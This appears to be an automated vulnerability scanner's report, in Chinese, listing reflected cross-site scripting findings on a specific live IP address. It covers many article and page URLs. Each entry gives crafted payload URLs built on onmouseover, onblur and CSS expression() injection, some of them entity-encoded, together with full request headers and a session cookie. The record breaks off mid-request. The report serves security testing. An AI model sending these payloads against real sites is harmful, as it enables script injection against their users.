检测到目标URL存在跨站漏洞
URL http://202.201.39.48/index.php/article/c37.html
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c37.html?'%20onmouseover=dfbhmg(6464)%20
2、设置参数 '%20onmouseover=dfbhmg(6464)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6464)
请求&响应 GET /index.php/article/c37.html?'%20onmouseover=dfbhmg(6464)%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c37.html
请求方式 GET
问题参数 var
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c37.html?var='%20onmouseover=%22dfbhmg(6999)%22%3e%20
2、设置参数 var'%20onmouseover=%22dfbhmg(6999)%22%3e%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6999)
请求&响应 GET /index.php/article/c37.html?var='%20onmouseover=%22dfbhmg(6999)%22%3e%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c37.html
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c37.html/'%20onmouseover=%22dfbhmg(6106)%22%3e%20
2、设置参数 '%20onmouseover=%22dfbhmg(6106)%22%3e%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6106)
请求&响应 GET /index.php/article/c37.html/'%20onmouseover=%22dfbhmg(6106)%22%3e%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c37.html
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c37.html;'%20onmouseover=%22dfbhmg(6594)%22%3e%20var=%20
2、设置参数 '%20onmouseover=%22dfbhmg(6594)%22%3e%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6594)
请求&响应 GET /index.php/article/c37.html;'%20onmouseover=%22dfbhmg(6594)%22%3e%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c37.html
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c37.html'%20onmouseover=%22dfbhmg(6770)%22%3e%20
2、设置参数 '%20onmouseover=%22dfbhmg(6770)%22%3e%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6770)
请求&响应 GET /index.php/article/c37.html'%20onmouseover=%22dfbhmg(6770)%22%3e%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c38.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c38.mhtml?'%20onmouseover=dfbhmg(6735)%20var=%20
2、设置参数 '%20onmouseover=dfbhmg(6735)%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6735)
请求&响应 GET /index.php/article/c38.mhtml?'%20onmouseover=dfbhmg(6735)%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c38.html

URL http://202.201.39.48/index.php/article/c38.mhtml
请求方式 GET
问题参数 var
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c38.mhtml?var='%20style=dfbhmg:expre/**/ssion(dfbhmg(6028))%20var=%20
2、设置参数 var'%20style=dfbhmg:expre/**/ssion(dfbhmg(6028))%20var=%20
3、在响应头及响应内容中匹配: style.*?dfbhmg:expre/**/ssion(dfbhmg(6028))
请求&响应 GET /index.php/article/c38.mhtml?var='%20style=dfbhmg:expre/**/ssion(dfbhmg(6028))%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c38.html

URL http://202.201.39.48/index.php/search-index-atestu-1.mhtml
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/search-index-atestu-"%20onmouseover=dfbhmg(6048)%20.mhtml
2、设置参数 value0"%20onmouseover=dfbhmg(6048)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6048)
请求&响应 GET /index.php/search-index-atestu-"%20onmouseover=dfbhmg(6048)%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/search/?words=atestu

URL http://202.201.39.48/index.php/article/c36.html
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c36.html?'%20style=dfbhmg:expre/**/ssion(dfbhmg(6588))%20var=%20
2、设置参数 '%20style=dfbhmg:expre/**/ssion(dfbhmg(6588))%20var=%20
3、在响应头及响应内容中匹配: style.*?dfbhmg:expre/**/ssion(dfbhmg(6588))
请求&响应 GET /index.php/article/c36.html?'%20style=dfbhmg:expre/**/ssion(dfbhmg(6588))%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c36.html
请求方式 GET
问题参数 var
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c36.html?var='%20onmouseover=%22dfbhmg(6656)%22%3e%20
2、设置参数 var'%20onmouseover=%22dfbhmg(6656)%22%3e%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6656)
请求&响应 GET /index.php/article/c36.html?var='%20onmouseover=%22dfbhmg(6656)%22%3e%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c36.html
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c36.html/'%20onmouseover=dfbhmg(6759)%20var=%20
2、设置参数 '%20onmouseover=dfbhmg(6759)%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6759)
请求&响应 GET /index.php/article/c36.html/'%20onmouseover=dfbhmg(6759)%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c36.html
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c36.html;'%20onmouseover=%22dfbhmg(6989)%22%3e%20var=%20
2、设置参数 '%20onmouseover=%22dfbhmg(6989)%22%3e%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6989)
请求&响应 GET /index.php/article/c36.html;'%20onmouseover=%22dfbhmg(6989)%22%3e%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c36.html
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c36.html'%20onmouseover=%22dfbhmg(6800)%22%3e%20
2、设置参数 '%20onmouseover=%22dfbhmg(6800)%22%3e%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6800)
请求&响应 GET /index.php/article/c36.html'%20onmouseover=%22dfbhmg(6800)%22%3e%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/page/15.html
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/page/"%20onmouseover=%22dfbhmg(6624)%22%3e%20.html
2、设置参数 value0"%20onmouseover=%22dfbhmg(6624)%22%3e%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6624)
请求&响应 GET /index.php/page/"%20onmouseover=%22dfbhmg(6624)%22%3e%20.html HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c19.html
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c19.html?'%20onmouseover=%22dfbhmg(6533)%22%3e%20
2、设置参数 '%20onmouseover=%22dfbhmg(6533)%22%3e%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6533)
请求&响应 GET /index.php/article/c19.html?'%20onmouseover=%22dfbhmg(6533)%22%3e%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c19.html
请求方式 GET
问题参数 var
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c19.html?var='%20onmouseover=%22dfbhmg(6625)%22%3e%20
2、设置参数 var'%20onmouseover=%22dfbhmg(6625)%22%3e%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6625)
请求&响应 GET /index.php/article/c19.html?var='%20onmouseover=%22dfbhmg(6625)%22%3e%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c19.html
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c19.html/'%20onmouseover=dfbhmg(6898)%20var=%20
2、设置参数 '%20onmouseover=dfbhmg(6898)%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6898)
请求&响应 GET /index.php/article/c19.html/'%20onmouseover=dfbhmg(6898)%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c19.html
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c19.html;'%20onmouseover=dfbhmg(6319)%20
2、设置参数 '%20onmouseover=dfbhmg(6319)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6319)
请求&响应 GET /index.php/article/c19.html;'%20onmouseover=dfbhmg(6319)%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c19.html
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c19.html'%20style=dfbhmg:expre/**/ssion(dfbhmg(6244))%20var=%20
2、设置参数 '%20style=dfbhmg:expre/**/ssion(dfbhmg(6244))%20var=%20
3、在响应头及响应内容中匹配: style.*?dfbhmg:expre/**/ssion(dfbhmg(6244))
请求&响应 GET /index.php/article/c19.html'%20style=dfbhmg:expre/**/ssion(dfbhmg(6244))%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/19.html
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/19'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x30;%26%23x31;%26%23x33;%26%23x29;%20.html
2、设置参数 value0'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x30;%26%23x31;%26%23x33;%26%23x29;%20
3、在响应头及响应内容中匹配: onblur.*?dfbhmg(6013)
请求&响应 GET /index.php/article/19'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x30;%26%23x31;%26%23x33;%26%23x29;%20.html HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c17.html
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c17.html?'%20onmouseover=dfbhmg(6770)%20
2、设置参数 '%20onmouseover=dfbhmg(6770)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6770)
请求&响应 GET /index.php/article/c17.html?'%20onmouseover=dfbhmg(6770)%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c17.html
请求方式 GET
问题参数 var
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c17.html?var='%20onmouseover=%22dfbhmg(6728)%22%3e%20var=%20
2、设置参数 var'%20onmouseover=%22dfbhmg(6728)%22%3e%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6728)
请求&响应 GET /index.php/article/c17.html?var='%20onmouseover=%22dfbhmg(6728)%22%3e%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c17.html
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c17.html/'%20onmouseover=dfbhmg(6373)%20
2、设置参数 '%20onmouseover=dfbhmg(6373)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6373)
请求&响应 GET /index.php/article/c17.html/'%20onmouseover=dfbhmg(6373)%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c17.html
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c17.html;'%20onmouseover=%22dfbhmg(6204)%22%3e%20
2、设置参数 '%20onmouseover=%22dfbhmg(6204)%22%3e%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6204)
请求&响应 GET /index.php/article/c17.html;'%20onmouseover=%22dfbhmg(6204)%22%3e%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c17.html
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c17.html'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x32;%26%23x37;%26%23x31;%26%23x29;%20
2、设置参数 '%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x32;%26%23x37;%26%23x31;%26%23x29;%20
3、在响应头及响应内容中匹配: onblur.*?dfbhmg(6271)
请求&响应 GET /index.php/article/c17.html'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x32;%26%23x37;%26%23x31;%26%23x29;%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/page/17.html
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/page/"%20onmouseover=dfbhmg(6150)%20.html
2、设置参数 value0"%20onmouseover=dfbhmg(6150)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6150)
请求&响应 GET /index.php/page/"%20onmouseover=dfbhmg(6150)%20.html HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/36.html
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/36'%20onmouseover=%22dfbhmg(6165)%22%3e%20var=%20.html
2、设置参数 value0'%20onmouseover=%22dfbhmg(6165)%22%3e%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6165)
请求&响应 GET /index.php/article/36'%20onmouseover=%22dfbhmg(6165)%22%3e%20var=%20.html HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
